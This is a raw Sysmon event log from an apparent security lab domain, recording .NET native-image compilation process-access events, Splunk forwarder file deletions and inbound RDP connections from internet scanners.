14:58:35.950{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1B-607E-790E-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080203Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.935{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1B-607E-790E-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080202Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.935{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1B-607E-790E-00000000BB01}1108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080201Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.841{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1B-607E-780E-00000000BB01}4972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080200Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.825{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1B-607E-780E-00000000BB01}4972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080199Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.825{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1B-607E-780E-00000000BB01}4972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080198Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.779{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1B-607E-770E-00000000BB01}3508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080197Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.779{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1B-607E-770E-00000000BB01}3508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080196Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.779{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1B-607E-770E-00000000BB01}3508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080195Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.700{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1B-607E-760E-00000000BB01}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080194Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.685{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1B-607E-760E-00000000BB01}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080193Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.685{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1B-607E-760E-00000000BB01}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080192Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.435{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1B-607E-750E-00000000BB01}5996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080191Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.435{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1B-607E-750E-00000000BB01}5996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080190Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.435{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1B-607E-750E-00000000BB01}5996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080189Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:35.372{A7A01FEF-EC1A-607E-740E-00000000BB01}6800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a90-0\Microsoft.Office.Tools.Word.Implementation.dll2021-04-20 14:58:35.372 354300x800000000000000080188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:33.242{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64965-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000080187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:35.279{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2005ACC7BECFD6E1538AFC08C79DDD93,SHA256=72414F12E4BB88DF95C06AB83237B521C473C5DD1983B20C22DC3B9873C59DBE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050558Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:32.953{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55808-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050557Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:35.200{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21EE609D46F9FE9F35C87B0487F024DC,SHA256=0DD1318DE0FBBE2066A0EF5AB1B2E4DDE7187767058292CC616B681321FFF7A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050556Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:35.091{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A5354CBD9CA1A258495E7341BB1571D,SHA256=50180D0F5D000AD0FC32BEF96FA296D5B77A6A08C8DB87894C9B3D390B362ACB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.982{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-840E-00000000BB01}6644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.982{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-840E-00000000BB01}6644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.919{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-830E-00000000BB01}6840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.904{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-830E-00000000BB01}6840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.904{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-830E-00000000BB01}6840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.872{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-820E-00000000BB01}6512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 